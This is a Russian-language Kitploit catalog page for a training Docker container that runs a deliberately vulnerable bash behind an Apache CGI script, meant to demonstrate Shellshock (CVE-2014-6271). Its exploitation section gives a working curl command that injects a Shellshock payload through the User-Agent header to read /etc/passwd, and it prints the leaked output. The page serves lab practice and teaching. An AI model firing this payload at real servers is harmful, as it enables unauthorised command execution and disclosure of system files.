Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
vaas-cve-2014-6271 — Уязвимость как услуга: демонстрация CVS-2014-6271, также известной как Shellshock | Kitploit
Инструменты/GitHubGitHub/hmlio/vaas-cve-2014-6271
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubhmlio/vaas-cve-2014-6271

vaas-cve-2014-6271

Уязвимость как услуга: демонстрация CVS-2014-6271, также известной как Shellshock

Репозиторий
2276 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость как услуга - CVE 2014-6271

Система Debian (Buster) Linux с уязвимой версией bash и веб-приложение для демонстрации CVE-2014-6271, также известного как Shellshock.

Обзор

Этот docker-контейнер основан на Debian Buster и был изменён для использования уязвимой версии Bash (bash_4.2:2b:dfsg-0.1).

Веб-приложение доступно через Apache 2 и обслуживает CGI-скрипт, который выполняет команды оболочки.

Использование

Установите контейнер с помощью docker pull hmlio/vaas-cve-2014-6271

Запустите контейнер с пробросом порта docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

Вы должны иметь возможность получить доступ к веб-приложению по адресу http://your-ip:8080/.

Эксплуатация

Веб-приложение/уязвимую версию bash можно эксплуатировать, как показано ниже:

root@kitploit:~
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Благодарности

Концепция и веб-приложение сильно вдохновлены VM "Sokar" с VulnHub, созданной rasta_mouse. За дополнительными подробностями обратитесь к https://www.vulnhub.com/entry/sokar-1,113/.

Скачать инструмент